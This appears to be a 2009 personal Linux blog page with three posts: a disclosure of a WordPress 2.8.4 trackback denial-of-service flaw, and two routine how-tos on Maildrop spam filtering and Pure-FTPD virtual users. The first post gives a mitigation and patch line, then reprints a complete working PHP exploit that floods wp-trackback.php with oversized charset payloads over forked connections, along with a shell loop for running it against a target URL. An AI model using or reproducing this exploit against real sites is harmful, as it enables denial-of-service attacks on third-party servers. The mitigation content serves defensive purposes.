Steve Fortuna » Linux

New 0-Day WordPress Exploit

steve — Mon, 19 Oct 2009 18:36:51 +0000

WordPress is vulnerable to a very dirty exploit right now as of 2.8.4. There’s a resource exhaustion DoS that is floating around the public right now. It’s a vulnerability in wp-trackbacks.php that hurts.

Here’s the results from a quick test against my server:

13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24

Very dirty.

Here’s a temporary fix that can be implemented until we get a real patch.

Add the following lines to your Apache 2 config file:
Order allow,deny Deny from all
This should be placed in the main config, not a virtual hosts config. This will disable any URLs with “wp-trackback.php” in it. This is a quick and ugly fix, but will help against this attack.

I expect WordPress will have an update soon.

UPDATE: With the help of a friend we have created a quick fix:

In line #47 of wp-trackback.php, add this:

if(strlen($charset) > 50) die;

Here’s the actual exploit.

/* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * security@wordpress.org contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attack\n"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b); $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; } } ?>

Postfix Maildrop Spam Folder

steve — Thu, 17 Sep 2009 17:00:17 +0000

Filtering spam in Postfix is pretty simple. There’s some advanced techniques you can use, but simply setting up Spamassassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been implementing Maildrop to automatically move those files to a Junk folder. Here’s the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.

First, setup your /etc/maildroprc file:

# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT

# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`
}

# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
{
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
exception {
to $DEFAULT/.Junk/
}
}

The comments clearly state what’s going on there.

Once that’s setup, you will go into your /etc/postfix/master.cf and make sure the

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}

is not commented out.

Next you will have to set the /usr/bin/maildrop file setuid root. This is so maildrop can interact with authdaemon and the mail folders.

#chmod +s /usr/bin/maildrop

The last thing you have to do is add this to your /etc/postfix/main.cf file:

virtual_transport = maildrop
maildrop_destination_recipient_limit = 1

If there is another virtual_transport line, be sure to comment that out first.

And that’s all. Nice and simple way to handle all that Junk mail.

Debian Pure-FTPD Virtual Users Howto

steve — Mon, 07 Sep 2009 20:37:09 +0000

After being a dedicated Gentoo user, I’ve recently moved over to Debian. Hoping to work more on productive tasks, than just administrating my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.

I thought I’d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use. And here we go..

Enable PureDB authentication:

# cd /etc/pure-ftpd/auth

# ln -s ../conf/PureDB 50pure

To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication

# echo no > /etc/pure-ftpd/conf/UnixAuthentication

That’s it. Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.

I’ve always recommended Pure-FTPD for it’s security, features, and simplicity. You can find out more information at the official Pure-FTPD projects website: www.Pure-FTPD.org